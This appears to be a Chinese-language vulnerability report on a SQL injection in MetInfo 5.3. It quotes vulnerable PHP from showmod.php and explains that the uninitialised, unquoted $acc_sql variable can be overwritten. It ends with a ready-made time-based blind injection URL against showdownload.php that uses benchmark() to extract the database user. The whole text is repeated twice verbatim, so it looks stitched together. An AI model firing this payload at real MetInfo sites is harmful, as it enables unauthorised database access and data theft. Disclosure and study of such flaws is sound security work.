出现在MetInfo5.3/include/global/showmod.php中
if($dataoptimize[$pagemark]['nextlist']){ if($met_pnorder==1){ $csql="class1='$class1' and class2='$class2' and class3='$class3'"; $cpnorder=$class3?$class_list[$class3]['list_order']:($class2?$class_list[$class2]['list_order']:$class_list[$class1]['list_order']); } else{ $csql="class1='$class1'"; $cpnorder=$class_list[$class1]['list_order']; } $acc_sql=$met_member_use==2?"(access<='$metinfo_member_type') and":""; $pn_sql=pn_order($cpnorder,$news); if($cpnorder<4){ $allnews=$db->get_all("select * from $dbname where $csql and lang='$lang' and (recycle='0' or recycle='-1') and $acc_sql $pn_sql[2]"); $allnum=count($allnews); if($allnum>1){ foreach($allnews as $keyall=>$valall){ if($valall['id']==$id){ if(is_array($allnews[$keyall-1])){ if($keyall-1>=0){$prenews=$allnews[$keyall-1];} } if(is_array($allnews[$keyall+1])){ if($keyall+1<=$allnum){$nextnews=$allnews[$keyall+1];} }
$acc_sql没有初始化而且没单引号可以覆盖注入
进去这一步if($met_pnorder==1){ $csql="class1='$class1' and class2='$class2' and class3='$class3'"; $cpnorder=$class3?$class_list[$class3]['list_order']:($class2?$class_list[$class2]['list_order']:$class_list[$class1]['list_order']); } 可以覆盖了
看看数据库日志
成功带入字符 构造exp
**.**.**.**/MetInfo5.3/download/showdownload.php?id=1&acc_sql=aaaa or if(ascii(mid(user(),1,1))=114,benchmark(10000000,md5(2)),1)%23
出现在MetInfo5.3/include/global/showmod.php中
if($dataoptimize[$pagemark]['nextlist']){ if($met_pnorder==1){ $csql="class1='$class1' and class2='$class2' and class3='$class3'"; $cpnorder=$class3?$class_list[$class3]['list_order']:($class2?$class_list[$class2]['list_order']:$class_list[$class1]['list_order']); } else{ $csql="class1='$class1'"; $cpnorder=$class_list[$class1]['list_order']; } $acc_sql=$met_member_use==2?"(access<='$metinfo_member_type') and":""; $pn_sql=pn_order($cpnorder,$news); if($cpnorder<4){ $allnews=$db->get_all("select * from $dbname where $csql and lang='$lang' and (recycle='0' or recycle='-1') and $acc_sql $pn_sql[2]"); $allnum=count($allnews); if($allnum>1){ foreach($allnews as $keyall=>$valall){ if($valall['id']==$id){ if(is_array($allnews[$keyall-1])){ if($keyall-1>=0){$prenews=$allnews[$keyall-1];} } if(is_array($allnews[$keyall+1])){ if($keyall+1<=$allnum){$nextnews=$allnews[$keyall+1];} }
$acc_sql没有初始化而且没单引号可以覆盖注入
进去这一步if($met_pnorder==1){ $csql="class1='$class1' and class2='$class2' and class3='$class3'"; $cpnorder=$class3?$class_list[$class3]['list_order']:($class2?$class_list[$class2]['list_order']:$class_list[$class1]['list_order']); } 可以覆盖了
看看数据库日志
成功带入字符 构造exp
**.**.**.**/MetInfo5.3/download/showdownload.php?id=1&acc_sql=aaaa or if(ascii(mid(user(),1,1))=114,benchmark(10000000,md5(2)),1)%23